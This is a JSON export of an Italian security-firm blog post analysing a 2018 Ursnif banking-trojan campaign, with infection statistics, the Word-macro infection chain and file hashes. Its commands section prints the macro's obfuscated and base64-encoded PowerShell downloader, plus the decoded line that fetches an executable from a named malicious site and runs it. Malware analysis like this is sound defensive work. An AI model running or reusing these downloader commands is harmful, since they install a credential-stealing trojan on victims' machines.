{"id":349,"date":"2018-11-26T09:00:39","date_gmt":"2018-11-26T07:00:39","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=349"},"modified":"2022-03-30T09:47:36","modified_gmt":"2022-03-30T09:47:36","slug":"ursnif-overview","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/cyber-security-news\/ursnif-overview\/","title":{"rendered":"Ursnif – Attacchi in Italia"},"content":{"rendered":"

Ursnif<\/strong> \u00e8 un malware di tipo Banking Trojan <\/strong>costruito con lo scopo di mantenere l’accesso al sistema e sottrarre le credenziali dell’utente tramite funzionalit\u00e0 di keylogging<\/em>.<\/p>\n

Per far fronte a minacce di questo tipo, \u00e8 possibile usufruire dei servizi di protezione dei sistemi e infrastrutture erogato da Fortgale. Un team di analisti si occupa dell’identificazione<\/strong> di attacchi informatici, e di risposta<\/strong> e ripristino<\/strong> dello stato di sicurezza. I livelli di servizio sono pensati per rispondere ai requisiti di aziende piccole, medie e grandi (Informazioni e contatti Fortgale<\/a>).<\/p>\n

La campagna identificata e analizzata, \u00e8 la seconda ondata di attacchi Ursnif del mese di Novembre (YER, root folder del sistema di distribuzione). Di quest’ultima \u00e8 stato possibile individuare 775 postazioni italiane<\/strong> colpite, che rappresentando il 46%<\/strong> del totale:<\/p>\n

\"Ursnif

Ursnif infections<\/p><\/div>\n

Infezioni Italia e Mondo<\/h2>\n

Le operazioni di ricerca e di analisi ci hanno permesso di ottenere maggiori dettagli riguardanti i sistemi colpiti da malware Ursnif. Quella che segue \u00e8 la rappresentazione delle infezioni nel mondo. Particolarmente interessante notare quanto l’Italia sia un importante target<\/strong> del gruppo criminale che adopera il malware Ursnif.<\/p>\n

\"Ursnif

Ursnif – Attack Map<\/p><\/div>\n

Distribuzione delle infezioni in Italia che evidenzia le province pi\u00f9 colpite.<\/p>\n

\"Ursnif

Ursnif Italia<\/p><\/div>\n

Nelle immagini successive sono mostrati i dettagli delle compromissioni italiane. Da una parte la lista degli Internet Service Provider<\/strong> a cui sono connessi dispositivi con il maggior numero di infezioni. Nell’immagine a sinistra invece, la lista dei principali indirizzi IP dei sistemi compromessi.<\/strong><\/p>\n

\"Ursnif

Ursnif – ISP Infected<\/p><\/div>\n

 <\/p>\n

\"Compromissione

Compromissione sistemi aziendali<\/p><\/div>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n

Il processo di infezione<\/h2>\n

La catena di infezione del sistema informatico \u00e8 ormai nota, mail malevole contenenti documenti della suite Office, in questo caso Word<\/strong>, sotto forma di allegato o link da scaricare. Il documento malevolo contiene una Macro che, se abilitata, avvia una serie di comandi al sistema per la sua compromissione.<\/p>\n

\"Ursnif

Ursnif Word<\/p><\/div>\n

Comandi eseguiti<\/h4>\n

Il documento Word non contiene il malware ma agisce da downloader. <\/em>Si occupa quindi delle attivit\u00e0 di download<\/em> e avvio del malware:<\/p>\n

Step 1<\/strong> (comando cmd <\/em>offuscato):<\/h6>\n

cMd.EXE \/c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^u^A^G^k^A^b^g^B^h^A^H^M^A^d^Q^B^r^A^G^E^A^c^w^B^o^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^U^A^b^A^B^v^A^G^Y^A^M^g^A^u^A^H^c^A^b^w^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^3^A^D^g^A^M^w^A^2^A^D^A^A^M^Q^B^l^A^D^g^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^c^A^O^A^A^z^A^D^Y^A^M^A^A^x^A^G^U^A^O^A^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^H^Q^A<\/span><\/p><\/blockquote>\n

Step 2<\/strong> (comando Powershell<\/em>):<\/h6>\n

cMd.EXE \/c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBuAGkAbgBhAHMAdQBrAGEAcwBoAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHUAbABvAGYAMgAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA3ADgAMwA2ADAAMQBlADgALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADcAOAAzADYAMAAxAGUAOAAuAGUAeABlACcAOwAgAEUAeABpAHQA<\/span><\/p><\/blockquote>\n

Step 3<\/strong> (decodifica del comando Base64<\/em>):<\/h6>\n

(New-Object System Net WebClient) DownloadFile(“http:\/\/ninasukash com\/YER\/pelim php?l=ulof2 wos”, $env:APPDATA + ‘\\783601e8 exe’);Start-Process $env:APPDATA’\\783601e8 exe’; Exit<\/span><\/p><\/blockquote>\n

Il Malware URSNIF<\/h2>\n

Il comando Powershell<\/em> estratto procede al download del malware Ursnif dal sito internet ninasukash[.]com <\/strong>.<\/strong><\/p>\n

\n

{DownloadFile(“http:\/\/ninasukash com\/YER\/pelim php?l=ulof2 wos”, $env:APPDATA + ‘\\783601e8 exe’); }<\/span><\/p>\n<\/blockquote>\n

per poi essere contestualmente avviato dalla porzione di comando:<\/p>\n

\n

{ Start-Process $env:APPDATA’\\783601e8 exe } .<\/span><\/p>\n<\/blockquote>\n

 <\/p>\n\n\n\n\n\n\n\n
Info<\/strong><\/span><\/td>\nValue<\/strong><\/span><\/td>\n<\/tr>\n
\n
MD5<\/span><\/strong><\/span><\/div>\n<\/td>\n
ab33b0f6560c16133339182b8c5030ce<\/span><\/td>\n<\/tr>\n
SHA1<\/span><\/strong><\/span><\/td>\n261cb3e5595f4cca5a0c0a12006288e48a8f6d1e<\/span><\/td>\n<\/tr>\n
SHA256<\/strong>
\n<\/span><\/td>\n		0ce4392261f6d8d0a2fa666b649860716527f41ea90de948fb03affed69a50ac<\/span><\/td>\n<\/tr>\n
VirusTotal<\/strong><\/span><\/td>\nVirusTotal Link<\/a><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

 <\/p>\n

Maggiori dettagli tecnici nella seconda parte del post.<\/p>\n

 <\/p>\n\n\n\n
[lead-form form-id=2 title=Contatti]<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

 <\/p>\n","protected":false},"excerpt":{"rendered":"

Ursnif \u00e8 un malware di tipo Banking Trojan costruito con lo scopo di mantenere l’accesso al sistema e sottrarre le credenziali dell’utente tramite funzionalit\u00e0 di keylogging. Per far fronte a minacce di questo tipo, \u00e8 possibile usufruire dei servizi di protezione dei sistemi e infrastrutture erogato da Fortgale. Un team di analisti si occupa dell’identificazione di attacchi […]<\/p>\n","protected":false},"author":1,"featured_media":449,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[435,178,179,188,212,213,337,362,368,374],"class_list":["post-349","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security-news","tag-fortgale-report","tag-infection","tag-infections","tag-italia","tag-malware","tag-malware-analysis","tag-statistics","tag-trojan","tag-ursnif","tag-virus"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=349"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349\/revisions"}],"predecessor-version":[{"id":4500,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349\/revisions\/4500"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}